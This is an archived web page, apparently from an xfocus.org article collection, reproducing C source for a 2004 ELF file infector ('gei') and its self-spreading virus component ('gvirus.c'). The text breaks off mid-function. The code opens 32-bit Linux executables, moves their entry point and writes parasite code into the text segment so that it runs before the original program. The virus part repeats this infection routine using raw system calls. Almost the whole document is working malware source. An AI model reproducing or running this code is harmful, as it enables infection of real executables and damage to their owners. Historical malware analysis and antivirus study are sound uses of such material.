763.html

里面收集的是发表在www.xfocus.org上的文章

<br />
/* <br />
* gei - ELF Infector v0.0.2 (2004) <br />
* written by grip2 &lt;gript2@hotmail.com&gt; <br />
*/ <br />
<br />
#include &lt;elf.h&gt; <br />
#include &lt;fcntl.h&gt; <br />
#include &lt;sys/stat.h&gt; <br />
#include &lt;sys/mman.h&gt; <br />
#include &lt;stdio.h&gt; <br />
#include &lt;unistd.h&gt; <br />
#include &lt;string.h&gt; <br />
#include &lt;stdlib.h&gt; <br />
<br />
#include &quot;gvirus.h&quot; <br />
<br />
#define PAGE_SIZE 4096 <br />
#define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) &amp; ~(PAGE_SIZE - 1)) <br />
<br />
static int elf_infect(const char *filename, <br />
void *para_code, <br />
unsigned int para_code_size, <br />
unsigned long retaddr_addr_offset); <br />
<br />
int main(int argc, char *argv[]) <br />
{ <br />
#define MAX_FILENAME_LEN 256 <br />
char backup[MAX_FILENAME_LEN*4]; <br />
char restore[MAX_FILENAME_LEN*4]; <br />
<br />
if (argc != 2) { <br />
fprintf(stderr, <br />
&quot;gei - ELF Infector v0.0.2 written by grip2 &lt;gript2@hotmail.com&gt;\n&quot;); <br />
fprintf(stderr, &quot;Usage: %s &lt;elf-exec-file&gt;\n&quot;, argv[0]); <br />
return 1; <br />
} <br />
<br />
if (strcmp(argv[1], &quot;-l&quot;) == 0) { <br />
fprintf(stderr, &quot;Parasite code length: %d\n&quot;, <br />
&amp;parasite_code_end - &amp;parasite_code); <br />
return 1; <br />
} <br />
<br />
if (strlen(argv[1]) &gt; MAX_FILENAME_LEN) { <br />
fprintf(stderr, &quot;filename too long!\n&quot;); <br />
return 1; <br />
} <br />
<br />
sprintf(backup, &quot;cp -f %s .backup.%s\n&quot;, argv[1], argv[1]); <br />
sprintf(restore, &quot;cp -f .backup.%s %s\n&quot;, argv[1], argv[1]); <br />
<br />
system(backup); <br />
if (elf_infect(argv[1], &amp;parasite_code, <br />
&amp;parasite_code_end - &amp;parasite_code, <br />
PARACODE_RETADDR_ADDR_OFFSET) &lt; 0) { <br />
system(restore); <br />
return 1; <br />
} <br />
<br />
return 0; <br />
} <br />
<br />
static int elf_infect(const char *filename, <br />
void *para_code, <br />
unsigned int para_code_size, <br />
unsigned long retaddr_addr_offset) <br />
{ <br />
int fd = -1; <br />
int tmp_fd = -1; <br />
Elf32_Ehdr *ehdr = NULL; <br />
Elf32_Phdr *phdr; <br />
Elf32_Shdr *shdr; <br />
int i; <br />
int txt_index; <br />
struct stat stat; <br />
int align_code_size; <br />
unsigned long org_entry; <br />
void *new_code_pos; <br />
int tmp_flag; <br />
int size; <br />
unsigned char tmp_para_code[PAGE_SIZE]; <br />
<br />
char *tmpfile; <br />
tmpfile = tempnam(NULL, &quot;infector&quot;); <br />
<br />
fd = open(filename, O_RDWR); <br />
if (fd == -1) { <br />
perror(filename); <br />
goto err; <br />
} <br />
<br />
if (fstat(fd, &amp;stat) == -1) { <br />
perror(&quot;fstat&quot;); <br />
goto err; <br />
} <br />
<br />
#ifndef NDEBUG <br />
printf(&quot;file size: %lu\n&quot;, stat.st_size); <br />
#endif <br />
<br />
ehdr = mmap(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0); <br />
if (ehdr == MAP_FAILED) { <br />
perror(&quot;mmap ehdr&quot;); <br />
goto err; <br />
} <br />
<br />
/* Check ELF magic-ident */ <br />
if (ehdr-&gt;e_ident[EI_MAG0] != 0x7f <br />
|| ehdr-&gt;e_ident[EI_MAG1] != &#39;E&#39; <br />
|| ehdr-&gt;e_ident[EI_MAG2] != &#39;L&#39; <br />
|| ehdr-&gt;e_ident[EI_MAG3] != &#39;F&#39; <br />
|| ehdr-&gt;e_ident[EI_CLASS] != ELFCLASS32 <br />
|| ehdr-&gt;e_ident[EI_DATA] != ELFDATA2LSB <br />
|| ehdr-&gt;e_ident[EI_VERSION] != EV_CURRENT <br />
|| ehdr-&gt;e_type != ET_EXEC <br />
|| ehdr-&gt;e_machine != EM_386 <br />
|| ehdr-&gt;e_version != EV_CURRENT <br />
) { <br />
fprintf(stderr, &quot;File type not supported\n&quot;); <br />
goto err; <br />
} <br />
<br />
#ifndef NDEBUG <br />
printf(&quot;e_phoff: %08x\ne_shoff: %08x\n&quot;, <br />
ehdr-&gt;e_phoff, ehdr-&gt;e_shoff); <br />
printf(&quot;e_phentsize: %08x\n&quot;, ehdr-&gt;e_phentsize); <br />
printf(&quot;e_phnum: %08x\n&quot;, ehdr-&gt;e_phnum); <br />
printf(&quot;e_shentsize: %08x\n&quot;, ehdr-&gt;e_shentsize); <br />
printf(&quot;e_shnum: %08x\n&quot;, ehdr-&gt;e_shnum); <br />
#endif <br />
<br />
align_code_size = PAGE_ALIGN(para_code_size); <br />
<br />
/* Get program header and section header start address */ <br />
phdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr-&gt;e_phoff); <br />
shdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr-&gt;e_shoff); <br />
<br />
/* Locate the text segment */ <br />
txt_index = 0; <br />
while (1) { <br />
if (txt_index == ehdr-&gt;e_phnum - 1) { <br />
fprintf(stderr, &quot;Invalid e_phnum, text segment not found.\n&quot;); <br />
goto err; <br />
} <br />
if (phdr[txt_index].p_type == PT_LOAD <br />
&amp;&amp; phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */ <br />
#ifndef NDEBUG <br />
printf(&quot;text segment file offset: %u\n&quot;, phdr[txt_index].p_offset); <br />
#endif <br />
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size <br />
&gt; phdr[txt_index+1].p_vaddr) { <br />
fprintf(stderr, &quot;Better luck next file :-)\n&quot;); <br />
goto err; <br />
} <br />
<br />
break; <br />
} <br />
txt_index++; <br />
} <br />
<br />
/* Modify the entry point of the ELF */ <br />
org_entry = ehdr-&gt;e_entry; <br />
ehdr-&gt;e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz; <br />
<br />
new_code_pos = <br />
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz; <br />
<br />
/* Increase the p_filesz and p_memsz of text segment <br />
* for new code */ <br />
phdr[txt_index].p_filesz += align_code_size; <br />
phdr[txt_index].p_memsz += align_code_size; <br />
<br />
for (i = 0; i &lt; ehdr-&gt;e_phnum; i++) <br />
if (phdr[i].p_offset &gt;= (unsigned long) new_code_pos - (unsigned long) ehdr) <br />
phdr[i].p_offset += align_code_size; <br />
<br />
tmp_flag = 0; <br />
for (i = 0; i &lt; ehdr-&gt;e_shnum; i++) { <br />
if (shdr[i].sh_offset &gt;= (unsigned long) new_code_pos - (unsigned long) ehdr) { <br />
shdr[i].sh_offset += align_code_size; <br />
if (!tmp_flag &amp;&amp; i) { /* associating the new_code to the last <br />
* section in the text segment */ <br />
shdr[i-1].sh_size += align_code_size; <br />
tmp_flag = 1; <br />
printf(&quot;[%d sections patched]\n&quot;, i-1); <br />
} <br />
} <br />
} <br />
<br />
/* Increase p_shoff in the ELF header */ <br />
ehdr-&gt;e_shoff += align_code_size; <br />
<br />
/* Make a new file */ <br />
tmp_fd = open(tmpfile, O_WRONLY|O_CREAT, stat.st_mode); <br />
if (tmp_fd == -1) { <br />
perror(&quot;open&quot;); <br />
goto err; <br />
} <br />
<br />
size = new_code_pos - (void *) ehdr; <br />
if (write(tmp_fd, ehdr, size) != size) { <br />
perror(&quot;write&quot;); <br />
goto err; <br />
} <br />
<br />
memcpy(tmp_para_code, para_code, para_code_size); <br />
memcpy(tmp_para_code + retaddr_addr_offset, <br />
&amp;org_entry, sizeof(org_entry)); <br />
if (write(tmp_fd, tmp_para_code, align_code_size) != align_code_size) { <br />
perror(&quot;write&quot;); <br />
goto err; <br />
} <br />
<br />
if (write(tmp_fd, (void *) ehdr + size, stat.st_size - size) <br />
!= stat.st_size - size) { <br />
perror(&quot;write&quot;); <br />
goto err; <br />
} <br />
<br />
close(tmp_fd); <br />
munmap(ehdr, stat.st_size); <br />
close(fd); <br />
<br />
if (rename(tmpfile, filename) == -1) { <br />
perror(&quot;rename&quot;); <br />
goto err; <br />
} <br />
<br />
return 0; <br />
err: <br />
if (tmp_fd != -1) <br />
close(tmp_fd); <br />
if (ehdr) <br />
munmap(ehdr, stat.st_size); <br />
if (fd != -1) <br />
close(fd); <br />
return -1; <br />
} <br />
------------------------------ g-elf_infector.c ------------------------------ <br />
<br />
------------------------------ gvirus.h ------------------------------ <br />
#ifndef _G2_PARASITE_CODE_ <br />
#define _G2_PARASITE_CODE_ <br />
<br />
#ifndef NDEBUG <br />
#define PARACODE_RETADDR_ADDR_OFFSET 1704 <br />
#else <br />
#define PARACODE_RETADDR_ADDR_OFFSET 1232 <br />
#endif <br />
<br />
void parasite_code(void); <br />
void parasite_code_end(void); <br />
<br />
#endif <br />
------------------------------ gvirus.h ------------------------------ <br />
<br />
------------------------------ gvirus.c ------------------------------ <br />
<br />
/* <br />
* virus code in C (2004) <br />
* written by grip2 &lt;gript2@hotmail.com&gt; <br />
*/ <br />
<br />
#include &quot;gsyscall.h&quot; <br />
#include &quot;gvirus.h&quot; <br />
#include &lt;elf.h&gt; <br />
<br />
#define PAGE_SIZE 4096 <br />
#define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) &amp; ~(PAGE_SIZE - 1)) <br />
<br />
#ifndef NDEBUG <br />
#define PARACODE_LENGTH 1744 <br />
#else <br />
#define PARACODE_LENGTH 1248 <br />
#endif <br />
<br />
#ifndef NDEBUG <br />
#define V_DEBUG_WRITE(...) \ <br />
do {\ <br />
g_write(__VA_ARGS__);\ <br />
} while(0) <br />
#else <br />
#define V_DEBUG_WRITE(...) <br />
#endif <br />
<br />
static inline int infect_virus( <br />
const char *file, <br />
void *v_code, <br />
unsigned int v_code_size, <br />
unsigned long v_retaddr_addr_offset) <br />
{ <br />
int fd = -1; <br />
int tmp_fd = -1; <br />
Elf32_Ehdr *ehdr = NULL; <br />
Elf32_Phdr *phdr; <br />
Elf32_Shdr *shdr; <br />
int i; <br />
int txt_index; <br />
struct stat stat; <br />
int align_code_size; <br />
unsigned long org_entry; <br />
void *new_code_pos; <br />
int tmp_flag; <br />
int size; <br />
unsigned char tmp_v_code[PAGE_SIZE]; <br />
<br />
char tmpfile[32] = {&#39;/&#39;,&#39;t&#39;,&#39;m&#39;,&#39;p&#39;,&#39;/&#39;,&#39;.&#39;,&#39;g&#39;,&#39;v&#39;,&#39;i&#39;,&#39;r&#39;,&#39;u&#39;,&#39;s&#39;,&#39;\0&#39;}; <br />
<br />
#ifndef NDEBUG <br />
char err_type[32] = {&#39;f&#39;,&#39;i&#39;,&#39;l&#39;,&#39;e&#39;,&#39; &#39;,&#39;t&#39;,&#39;y&#39;,&#39;p&#39;,&#39;e&#39;,&#39; &#39;,&#39;n&#39;,&#39;o&#39;,&#39;t&#39;,&#39; &#39;, <br />
&#39;s&#39;,&#39;u&#39;,&#39;p&#39;,&#39;p&#39;,&#39;o&#39;,&#39;r&#39;,&#39;t&#39;,&#39;e&#39;,&#39;d&#39;,&#39;\n&#39;,&#39;\0&#39;}; <br />
char luck[32] = {&#39;B&#39;,&#39;e&#39;,&#39;t&#39;,&#39;t&#39;,&#39;e&#39;,&#39;r&#39;,&#39; &#39;,&#39;l&#39;,&#39;u&#39;,&#39;c&#39;,&#39;k&#39;,&#39; &#39;, <br />
&#39;n&#39;,&#39;e&#39;,&#39;x&#39;,&#39;t&#39;,&#39; &#39;,&#39;f&#39;,&#39;i&#39;,&#39;l&#39;,&#39;e&#39;,&#39;\n&#39;,&#39;\0&#39;}; <br />
#endif <br />
<br />
fd = g_open(file, O_RDWR, 0); <br />
if (fd == -1) { <br />
goto err; <br />
} <br />
<br />
if (g_fstat(fd, &amp;stat) == -1) { <br />
goto err; <br />
} <br />
<br />
ehdr = g_mmap2(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0); <br />
if (ehdr == MAP_FAILED) { <br />
goto err; <br />
} <br />
<br />
/* Check ELF magic-ident */ <br />
if (ehdr-&gt;e_ident[EI_MAG0] != 0x7f <br />
|| ehdr-&gt;e_ident[EI_MAG1] != &#39;E&#39; <br />
|| ehdr-&gt;e_ident[EI_MAG2] != &#39;L&#39; <br />
|| ehdr-&gt;e_ident[EI_MAG3] != &#39;F&#39; <br />
|| ehdr-&gt;e_ident[EI_CLASS] != ELFCLASS32 <br />
|| ehdr-&gt;e_ident[EI_DATA] != ELFDATA2LSB <br />
|| ehdr-&gt;e_ident[EI_VERSION] != EV_CURRENT <br />
|| ehdr-&gt;e_type != ET_EXEC <br />
|| ehdr-&gt;e_machine != EM_386 <br />
|| ehdr-&gt;e_version != EV_CURRENT <br />
) { <br />
V_DEBUG_WRITE(1, &amp;err_type, sizeof(err_type)); <br />
goto err; <br />
} <br />
<br />
align_code_size = PAGE_ALIGN(v_code_size); <br />
<br />
/* Get program header and section header start address */ <br />
phdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr-&gt;e_phoff); <br />
shdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr-&gt;e_shoff); <br />
<br />
/* Locate the text segment */ <br />
txt_index = 0; <br />
while (1) { <br />
if (txt_index == ehdr-&gt;e_phnum - 1) <br />
goto err; <br />
<br />
if (phdr[txt_index].p_type == PT_LOAD <br />
&amp;&amp; phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */ <br />
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size <br />